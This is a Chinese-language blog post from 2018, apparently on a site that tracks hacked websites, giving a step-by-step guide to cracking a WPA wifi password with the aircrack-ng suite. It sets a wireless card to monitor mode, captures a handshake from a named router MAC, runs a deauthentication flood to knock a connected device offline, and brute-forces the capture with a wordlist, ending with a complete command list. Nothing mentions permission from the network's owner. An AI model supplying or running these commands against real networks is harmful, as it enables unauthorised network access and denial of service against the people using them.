危险漫步-用aircrack-ng破解 wifi 密码


发布人:1271233221分类:运维交流浏览量:178发布时间:2018-07-07

开始前,先连上无线网卡,因为虚拟机中的kali系统不用调用笔记本自带的无线网卡,所以需要一个外接无线网卡,然后接入kali系统。

11.png

输入 ifconfig -a 查看网卡,多了个 wlan0,说明网卡已经适配好,不然可能是驱动有问题。

12.png

开启monitor模式,这里有些进程会影响到monitor模式的开启,如果开启成功可忽略,不然就依提示操作。

13.png

按提示操作的结果:

14.png

监听网络,完了  Ctrl+C  退出。

15.png

主要参数说明:

#BSSID :路由器、AP的MAC地址

# PWR :信号强度,一看就是越小越强了

# #Data :传输的数据大小,大的可能在下载或看视频什么的

# CH      :无线信道,要看准

# ENC    :加密协议,自WPA2协议爆出重大安全漏洞,现已经出WPA3,坐等更新

# ESSID  :这个就不用多说了,wifi名称,有中文可能会出现乱码哈

3. 目标有了,开始对其进行cap包的监听和获取,这里要让其中连接的设备重连才能抓包其握手包,可以慢慢等待,也可以使用deauth洪水攻击。

 

root@huan:~#airodump-ng -c 9 --bssid 78:11:DC:10:4F:66 -w /root/桌面/wuxianpj/handshake/wlan0mon

// -w 后面的路径是存放握手包的

16.png

4. 另起窗口,我们用deauth洪水攻击,让其中的一台设备掉线,它掉线后会自动连接(除非别人在wifi设置中勾选掉了自动连接)

root@huan:~#aireplay-ng -0 20 -c 6C:88:14:F2:47:8C -a 78:11:DC:10:4F:66 wlan0mon

// -0  death模式,20为攻击次数,也可以设为0,就是一直攻击

// -c 这里自然就是连接上的某台设备的MAC地址了,指定它,我们让它稳稳地掉线。

17.png

5. 看图,不废话

18.png

6. 话不多说,上字典(关键东西),让它慢慢破去吧

 

root@huan:~#aircrack-ng -w /root/桌面/wuxianpj/zidian/wordlist.txt /root/桌面/wuxianpj/handshake/-02.cap

19.png

7. 没错下一步操作,退出monitor模式,别忘了喔

199.png

aircrack-ng 爆破wifi密码 - 命令清单

~#airmon-ng start [网卡]       //开启monitor模式

~#airodump-ng [网卡]          //捕获附件的wifi信息

~#airodump-ng -c [信道]--bssid [路由器MAC] -w [handshake-path] [网卡]

~#aireplay-ng -0 [攻击次数值] -c [某连接设备MAC] -a [路由器MAC] [网卡]

~#aircrack-ng -w [字典-path] [破解的目标握手包-path]

~#airmon-ng stop [网卡]       //退出monitor模式


更多学习交流可以联系QQ:1271233221

被黑站点统计 - 文章版权1、本主题所有言论和图片纯属会员个人意见,与本文章立场无关
2、本站所有主题由该文章作者发表,该文章作者与被黑站点统计享有文章相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该文章作者和被黑站点统计的同意
4、文章作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
7、被黑站点统计管理员有权不事先通知发贴者而删除本文

免责声明

本站主要通过网络搜集国内被黑网站信息,统计分析数据,为部署安全型网络提供强有力的依据.本站所有工作人员均不参与黑站,挂马或赢利性行为,所有数据均为网民提供,提交者不一定是黑站人,所有提交采取不记名,先提交先审核的方式,如有任何疑问请及时与我们联系.

1271233221  的文章


微信公众号

微信公众号


Copyright © 2012-2022被黑网站统计系统All Rights Reserved
页面总访问量:15662780(PV) 页面执行时间:51.319(MS)